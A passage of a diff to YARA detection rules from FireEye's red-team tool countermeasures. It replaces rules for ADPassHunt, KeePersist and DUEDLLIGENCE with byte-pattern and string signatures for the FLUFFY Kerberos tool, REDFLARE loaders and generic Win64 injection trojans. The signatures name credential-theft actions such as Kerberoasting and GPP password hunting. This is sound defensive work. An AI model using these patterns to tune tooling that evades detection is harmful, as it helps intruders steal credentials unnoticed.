24 30 C7 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 45 33 C9 48 89 44 24 58 45 33 C0 C7 44 24 2? ?1 ?? ?? ?? BA ?? ?? ?? ?? 4C 89 74 24 60 FF ?? ?? ?? ?? ?? 48 8B F8 48 83 F8 FF 74 ?? 48 8B 4C 24 50 48 8D 44 24 58 48 89 44 24 30 41 B9 02 ?? ?? ?? 4C 89 74 24 28 4C 8B C7 8B D6 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 54 24 50 48 8B C8 FF ?? ?? ?? ?? ?? 33 C9 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B BC 24 C? ?1 ?? ?? 33 C0 48 8B B4 24 B8 01 ?? ?? 48 8B 9C 24 B? ?1 ?? ?? 48 8B 8D 9? ?? ?? ?0 48 33 CC E8 ?? ?? ?? ?? 4C 8B B4 24 C8 01 ?? ?? 48 81 C4 A? ?1 ?? ?? 5D C3 }
+		$bytes4 = { 4C 89 74 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC A0 01 00 00 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? BA 50 00 00 00 C7 05 ?? ?? ?? ?? 43 00 3A 00 66 89 15 ?? ?? 01 00 4C 8D 44 24 ?? 48 8D 15 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 5C 00 57 00 33 C9 C7 05 ?? ?? ?? ?? 69 00 6E 00 C7 05 ?? ?? ?? ?? 64 00 6F 00 C7 05 ?? ?? ?? ?? 77 00 73 00 C7 05 ?? ?? ?? ?? 5C 00 4D 00 C7 05 ?? ?? ?? ?? 45 00 4D 00 C7 05 ?? ?? ?? ?? 4F 00 52 00 C7 05 ?? ?? ?? ?? 59 00 2E 00 C7 05 ?? ?? ?? ?? 44 00 4D 00 C7 05 ?? ?? ?? ?? 53 00 65 00 C7 05 ?? ?? ?? ?? 44 00 65 00 C7 05 ?? ?? ?? ?? 42 00 75 00 C7 05 ?? ?? ?? ?? 47 00 50 00 C7 05 ?? ?? ?? ?? 72 00 69 00 C7 05 ?? ?? ?? ?? 56 00 69 00 C7 05 ?? ?? ?? ?? 4C 00 45 00 C7 05 ?? ?? ?? ?? 67 00 65 00 C7 05 ?? ?? ?? ?? 6C 73 61 73 C7 05 ?? ?? ?? ?? 73 2E 65 78 C6 05 ?? ?? ?? ?? 65 FF 15 ?? ?? ?? ?? 45 33 F6 85 C0 74 ?? 48 8B 44 24 ?? 48 89 44 24 ?? C7 44 24 ?? 01 00 00 00 C7 44 24 ?? 02 00 00 00 FF 15 ?? ?? ?? ?? 48 8B C8 4C 8D 44 24 ?? 41 8D 56 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 4C 8D 44 24 ?? 4C 89 74 24 ?? 45 33 C9 33 D2 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D ?? 41 B8 04 01 00 00 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 ?? 66 0F 1F 44 00 ?? 48 8B 4C 24 ?? 4C 8D 45 ?? 41 B9 04 01 00 00 33 D2 FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 D2 48 8D 4D ?? 41 B8 04 01 00 00 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 8B F0 48 85 DB 74 ?? 85 C0 74 ?? 4C 8D 4C 24 ?? 48 89 BC 24 ?? ?? ?? ?? BA FD 03 00 AC 41 B8 1F 00 10 00 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 4C 89 74 24 ?? C7 44 24 ?? 80 00 00 00 48 8D 0D ?? ?? ?? ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 C7 44 24 ?? 01 00 00 00 BA 00 00 00 10 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 83 F8 FF 74 ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 48 89 44 24 ?? 41 B9 02 00 00 00 4C 89 74 24 ?? 4C 8B C7 8B D6 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B C8 FF 15 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? CC 48 8B CB FF 15 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 33 C0 48 8B B4 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ?? ?? 48 81 C4 A0 01 00 00 5D C3 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $typelibguid
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and any of ( $bytes* )
 }
-rule FIREEYE_RT_Credtheft_MSIL_Adpasshunt_2 : FILE
+rule FIREEYE_RT_Trojan_Win64_Generic_23 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "b6103e23-8d1c-5d01-b283-f4545ccb924e"
-		date = "2020-12-09"
+		id = "470bfeed-e000-58c6-b115-dfa8aea25bef"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/CredTheft_MSIL_ADPassHunt_2.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/supplemental/yara/Trojan_Win64_Generic_23.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
-		logic_hash = "e7282905a8baeaeb8ec156171fbf2bc4ac811facb80959a88394f4938a145cc1"
-		score = 50
+		hash = "b66347ef110e60b064474ae746701d4a"
+		logic_hash = "4c1860801b26abbab8c4aea730bf69f388c902083b9945e11e6782af3ab22789"
+		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$pdb1 = "\\ADPassHunt\\"
-		$pdb2 = "\\ADPassHunt.pdb"
-		$s1 = "Usage: .\\ADPassHunt.exe"
-		$s2 = "[ADA] Searching for accounts with msSFU30Password attribute"
-		$s3 = "[ADA] Searching for accounts with userpassword attribute"
-		$s4 = "[GPP] Searching for passwords now"
+		$api1 = "VirtualAllocEx" fullword
+		$api2 = "UpdateProcThreadAttribute" fullword
+		$api3 = "DuplicateTokenEx" fullword
+		$api4 = "CreateProcessAsUserA" fullword
+		$inject = { 8B 85 [4] C7 44 24 20 40 00 00 00 41 B9 00 30 00 00 44 8B C0 33 D2 48 8B 8D [4] FF 15 [4] 48 89 45 ?? 48 83 7D ?? 00 75 ?? 48 8B 45 ?? E9 [4] 8B 85 [4] 48 C7 44 24 20 00 00 00 00 44 8B C8 4C 8B 85 [4] 48 8B 55 ?? 48 8B 8D [4] FF 15 [4] 85 C0 75 ?? 48 8B 45 ?? EB ?? 8B 85 [4] 48 8B 4D ?? 48 03 C8 48 8B C1 48 89 45 48 48 8D 85 [4] 48 89 44 24 30 C7 44 24 28 00 00 00 00 48 8B 85 [4] 48 89 44 24 20 4C 8B 4D ?? 41 B8 00 00 10 00 33 D2 48 8B 8D [4] FF 15 }
+		$process = { 48 C7 44 24 30 00 00 00 00 48 C7 44 24 28 00 00 00 00 48 C7 44 24 20 08 00 00 00 4C 8D 8D [4] 41 B8 00 00 02 00 33 D2 48 8B 8D [4] FF 15 [4] 85 C0 75 ?? E9 [4] 48 8B 85 [4] 48 89 85 [4] 48 8D 85 [4] 48 89 44 24 50 48 8D 85 [4] 48 89 44 24 48 48 C7 44 24 40 00 00 00 00 48 C7 44 24 38 00 00 00 00 C7 44 24 30 04 00 08 00 C7 44 24 28 00 00 00 00 48 C7 44 24 20 00 00 00 00 45 33 C9 4C 8D 05 [4] 33 D2 48 8B [2-5] FF 15 }
+		$token = { FF 15 [4] 4C 8D 45 ?? BA 0A 00 00 00 48 8B C8 FF 15 [4] 85 C0 75 ?? E9 [4] 48 8D [2-5] 48 89 44 24 28 C7 44 24 20 02 00 00 00 41 B9 02 00 00 00 45 33 C0 BA 0B 00 00 00 48 8B 4D ?? FF 15 [4] 85 C0 75 ?? E9 [4] 4C 8D 8D [4] 45 33 C0 BA 01 00 00 00 33 C9 FF 15 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( ( @pdb2 [ 1 ] < @pdb1 [ 1 ] + 50 ) or 2 of ( $s* ) )
+		(( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) ) and all of them
 }
-rule FIREEYE_RT_Credtheft_MSIL_Adpasshunt_1 : FILE
+rule FIREEYE_RT_Trojan_Win64_Generic_22 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public ADPassHunt project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "35fb8032-c73a-549f-9bd9-409f7050bdb0"
-		date = "2020-12-09"
+		id = "e79661a8-5254-5e8e-b92b-edf1ddb072ff"
+		date = "2020-11-26"
+		date = "2020-11-26"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/CredTheft_MSIL_ADPassHunt_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/supplemental/yara/Trojan_Win64_Generic_22.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
-		logic_hash = "85c7c147d6bf5b7cb417ff2910a3e7ab3be5e8a3651758c07f8f0ed42b5964d8"
-		score = 50
-		quality = 73
+		hash = "f7d9961463b5110a3d70ee2e97842ed3"
+		logic_hash = "52fbe5c0ee7c05df5fcd62c26caaa5498e32352da9c5940e522aa31d6c808028"
+		score = 75
+		quality = 75
 		tags = "FILE"
-		rev = 4
+		rev = 2
 
 	strings:
-		$typelibguid = "15745B9E-A059-4AF1-A0D8-863E349CD85D" ascii nocase wide
+		$api1 = "VirtualAllocEx" fullword
+		$api2 = "UpdateProcThreadAttribute" fullword
+		$api3 = "DuplicateTokenEx" fullword
+		$api4 = "CreateProcessAsUserA" fullword
+		$inject = { C7 44 24 20 40 00 00 00 33 D2 41 B9 00 30 00 00 41 B8 [4] 48 8B CB FF 15 [4] 48 8B F0 48 85 C0 74 ?? 4C 89 74 24 20 41 B9 [4] 4C 8D 05 [4] 48 8B D6 48 8B CB FF 15 [4] 85 C0 75 [5-10] 4C 8D 0C 3E 48 8D 44 24 ?? 48 89 44 24 30 44 89 74 24 28 4C 89 74 24 20 33 D2 41 B8 [4] 48 8B CB FF 15 }
+		$process = { 89 74 24 30 ?? 8D 4C 24 [2] 89 74 24 28 33 D2 41 B8 00 00 02 00 48 C7 44 24 20 08 00 00 00 48 8B CF FF 15 [4] 85 C0 0F 84 [4] 48 8B [2-3] 48 8D 45 ?? 48 89 44 24 50 4C 8D 05 [4] 48 8D 45 ?? 48 89 7D 08 48 89 44 24 48 45 33 C9 ?? 89 74 24 40 33 D2 ?? 89 74 24 38 C7 44 24 30 04 00 08 00 [0-1] 89 74 24 28 ?? 89 74 24 20 FF 15 }
+		$token = { FF 15 [4] 4C 8D 44 24 ?? BA 0A 00 00 00 48 8B C8 FF 15 [4] 85 C0 0F 84 [4] 48 8B 4C 24 ?? 48 8D [2-3] 41 B9 02 00 00 00 48 89 44 24 28 45 33 C0 C7 44 24 20 02 00 00 00 41 8D 51 09 FF 15 [4] 85 C0 0F 84 [4] 45 33 C0 4C 8D 4C 24 ?? 33 C9 41 8D 50 01 FF 15 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $typelibguid
+		(( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) ) and all of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_Adpasshunt_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_FLUFFY_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "736b5300-215b-5314-9234-69ff0050b73e"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "6593202d-9b30-59ed-98c0-3e730fb5ceb7"
+		date = "2020-12-04"
+		date = "2020-12-04"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/APT_HackTool_MSIL_ADPassHunt_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/FLUFFY/production/yara/APT_HackTool_MSIL_FLUFFY_1.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
-		logic_hash = "63135c81c1a6b967cb26cced628afc0e7ef485923e6a7fd70a4d4672118d6a8c"
-		score = 50
+		hash = "11b5aceb428c3e8c61ed24a8ca50553e"
+		logic_hash = "4d91c96ab7b628e88f79ee193612acc959448fe2220ef54371f5f5c6e7305d86"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 1
 
 	strings:
-		$sb1 = { 73 [2] 00 0A 0A 02 6F [2] 00 0A 0B 38 [4] 12 ?? 28 [2] 00 0A 0? 73 [2] 00 0A 0? 0? 0? 6F [2] 00 0A 1? 13 ?? 72 [4] 13 ?? 0? 6F [2] 00 0A 72 [4] 6F [2] 00 0A 1? 3B [4] 11 ?? 72 [4] 28 [2] 00 0A 13 ?? 0? 72 [4] 6F [2] 00 0A 6F [2] 00 0A 13 ?? 38 [4] 11 ?? 6F [2] 00 0A 74 [2] 00 01 13 ?? 11 ?? 72 [4] 6F [2] 00 0A 2C ?? 11 ?? 72 [4] 11 ?? 6F [2] 00 0A 72 [4] 6F [2] 00 0A 6F [2] 00 0A 72 [4] 28 [2] 00 0A }
-		$sb2 = { 02 1? 8D [2] 00 01 [0-32] 1? 1F 2E 9D 6F [2] 00 0A 72 [4] 0A 0B 1? 0? 2B 2E 0? 0? 9A 0? 0? 72 [4] 6F [2] 00 0A 2D ?? 06 72 [4] 28 [2] 00 0A 0A 06 72 [4] 0? 28 [2] 00 0A 0A 0? 1? 58 0? 0? 0? 8E 69 32 CC 06 2A }
+		$sb1 = { 0E ?? 1? 72 [4] 28 [2] 00 06 [0-16] 28 [2] 00 0A [2-80] 1F 58 0? [0-32] 28 [2] 00 06 [2-32] 1? 28 [2] 00 06 0? 0? 6F [2] 00 06 [2-4] 1F 0B }
+		$sb2 = { 73 [2] 00 06 13 ?? 11 ?? 11 ?? 7D [2] 00 04 11 ?? 73 [2] 00 0A 7D [2] 00 04 0E ?? 2D ?? 11 ?? 7B [2] 00 04 72 [4] 28 [2] 00 0A [2-32] 0? 28 [2] 00 0A [2-16] 11 ?? 7B [2] 00 04 0? 28 [2] 00 0A 1? 28 [2] 00 0A [2-32] 7E [2] 00 0A [0-32] FE 15 [2] 00 02 [0-16] 7D [2] 00 04 28 [2] 00 06 [2-32] 7B [2] 00 04 7D [2] 00 04 [2-32] 7C [2] 00 04 FE 15 [2] 00 02 [0-16] 11 ?? 8C [2] 00 02 28 [2] 00 0A 28 [2] 00 0A [2-80] 8C [2] 00 02 28 [2] 00 0A 12 ?? 12 ?? 12 ?? 28 [2] 00 06 }
+		$ss1 = "\x00Fluffy\x00"
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_Adpasshunt_2 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_FLUFFY_2 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "a3b12fd7-e82d-5ef0-9125-7c069cd9bec4"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "ce39710e-7649-5f7d-bbbe-65dc30f678e8"
+		date = "2020-12-04"
+		date = "2020-12-04"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/APT_HackTool_MSIL_ADPassHunt_2.yar#L4-L23"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/FLUFFY/production/yara/APT_HackTool_MSIL_FLUFFY_2.yar#L4-L21"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
-		logic_hash = "e2dc7db1860eef04a569f007c32abd507dd588d1392613efbb31f42ca66ff735"
-		score = 50
+		hash = "11b5aceb428c3e8c61ed24a8ca50553e"
+		logic_hash = "872ab717668375a49d6c7b1927a680747b405c0198fe4fc6f43ccc562870eb37"
+		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$s1 = "LDAP://" wide
-		$s2 = "[GPP] Searching for passwords now..." wide
-		$s3 = "Searching Group Policy Preferences (Get-GPPPasswords + Get-GPPAutologons)!" wide
-		$s4 = "possibilities so far)..." wide
-		$s5 = "\\groups.xml" wide
-		$s6 = "Found interesting file:" wide
-		$s7 = "\x00GetDirectories\x00"
-		$s8 = "\x00DirectoryInfo\x00"
+		$s1 = "\x00Asktgt\x00"
+		$s2 = "\x00Kerberoast\x00"
+		$s3 = "\x00HarvestCommand\x00"
+		$s4 = "\x00EnumerateTickets\x00"
+		$s5 = "[*] Action: " wide
+		$s6 = "\x00Fluffy.Commands\x00"
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Loader_MSIL_Allthethings_1 : FILE
+rule FIREEYE_RT_APT_Loader_Raw64_REDFLARE_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'AllTheThings' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "1805b406-2531-56bf-8e08-e63a59ffcc84"
-		date = "2020-12-09"
+		id = "8e937f6a-404f-53bd-9de2-ed63b1cf48b2"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ALLTHETHINGS/production/yara/Loader_MSIL_AllTheThings_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Raw64_REDFLARE_1.yar#L4-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "e3058095f2a49f8c0f78cb392024795367609b04c1da80210ab8d72c6613ee71"
+		hash = "5e14f77f85fd9a5be46e7f04b8a144f5"
+		logic_hash = "dac122ccece8a6dd35a5fe9d37860a612aa50ab469b79f4375dbe776f60c7b57"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 1
 
 	strings:
-		$typelibguid0 = "542ccc64-c4c3-4c03-abcd-199a11b26754" ascii nocase wide
+		$load = { EB ?? 58 48 8B 10 4C 8B 48 ?? 48 8B C8 [1-10] 48 83 C1 ?? 48 03 D1 FF }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) != 0x5A4D ) and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Keepersist_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win64_REDFLARE_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'KeePersist' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "950a4744-2696-5eb7-8524-7f689cb5dbb0"
-		date = "2020-12-09"
+		id = "dc162f26-66d3-5359-b1d7-ef2208b359e2"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/KEEPERSIST/production/yara/HackTool_MSIL_KeePersist_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win64_REDFLARE_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "eae67c77a64ca07f9ef59a356bb2c3f3131f14e7f17c898ef8857a21090ace0e"
+		hash = "f20824fa6e5c81e3804419f108445368"
+		logic_hash = "2cae245a6aa36dccc2228cccefdc4ca0eb278901f063e072a369000f67d73a55"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 1
 
 	strings:
-		$typelibguid0 = "1df47db2-7bb8-47c2-9d85-5f8d3f04a884" ascii nocase wide
+		$alloc_n_load = { 41 B9 40 00 00 00 41 B8 00 30 00 00 33 C9 [1-10] FF 50 [4-80] F3 A4 [30-120] 48 6B C9 28 [3-20] 48 6B C9 28 }
+		$const_values = { 0F B6 ?? 83 C? 20 83 F? 6D [2-20] 83 C? 20 83 F? 7A }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_MSIL_Launcher_DUEDLLIGENCE_1 : FILE
+rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_3 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'DUEDLLIGENCE' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "86f0ebe5-110b-53e2-bba5-676f00c2cddd"
-		date = "2020-12-09"
+		id = "2f6785c4-f4d0-52ff-8c46-da953e2ca92a"
+		date = "2020-12-01"
+		date = "2020-12-01"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/MSIL_Launcher_DUEDLLIGENCE_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_3.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "a91bf61cc18705be2288a0f6f125068f"
-		logic_hash = "bd6abaa909f0c776d81ed1115e875888336661c91df3881f4f3ea5dd27e115f8"
+		hash = "9ccda4d7511009d5572ef2f8597fba4e,ece07daca53dd0a7c23dacabf50f56f1"
+		logic_hash = "ee104bc145686a134e4d6d620dae7d1dacff7645d47f1a8d7a212327352b8e87"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$typelibguid0 = "73948912-cebd-48ed-85e2-85fcd1d4f560" ascii nocase wide
+		$calc_image_size = { 28 00 00 00 [2-30] 83 E2 1F [4-20] C1 F8 05 [0-8] 0F AF C? [0-30] C1 E0 02 }
+		$str1 = "CreateCompatibleBitmap" fullword
+		$str2 = "BitBlt" fullword
+		$str3 = "runCommand" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Loader_MSIL_DUEDLLIGENCE_2 : FILE
+rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_7 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "b10b476a-0d38-53e4-80cf-559618729268"
-		date = "2020-12-18"
-		modified = "2020-12-18"
+		id = "f891e477-9ff2-57be-9ca5-dd87d9baee29"
+		date = "2020-12-02"
+		date = "2020-12-02"
+		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/Loader_MSIL_DUEDLLIGENCE_2.yar#L5-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_7.yar#L4-L21"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		logic_hash = "5a2e0559e3b47c1957a42929fbbeba7a53c21619125381b01dcd8453b6ec4802"
+		hash = "e7beece34bdf67cbb8297833c5953669, 8025bcbe3cc81fc19021ad0fbc11cf9b"
+		logic_hash = "6d7822256ac1bef05304d3396df773e2b20a397311ad820d6ec5fe4cb6bdfbbc"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
+		rev = 1
 
 	strings:
-		$1 = "DueDLLigence" fullword
-		$2 = "CPlApplet" fullword
-		$iz1 = /_Cor(Exe|Dll)Main/ fullword
+		$1 = "initialize" fullword
+		$2 = "getData" fullword
+		$3 = "putData" fullword
+		$4 = "fini" fullword
+		$5 = "NamedPipe"
+		$named_pipe = { 88 13 00 00 [1-8] E8 03 00 00 [20-60] 00 00 00 00 [1-8] 00 00 00 00 [1-40] ( 6A 00 6A 00 6A 03 6A 00 6A 00 68 | 00 00 00 00 [1-6] 00 00 00 00 [1-6] 03 00 00 00 45 33 C? 45 33 C? BA ) 00 00 00 C0 [2-10] FF 15 [4-30] FF 15 [4-7] E7 00 00 00 [4-40] FF 15 [4] 85 C0 }
 
 	condition:
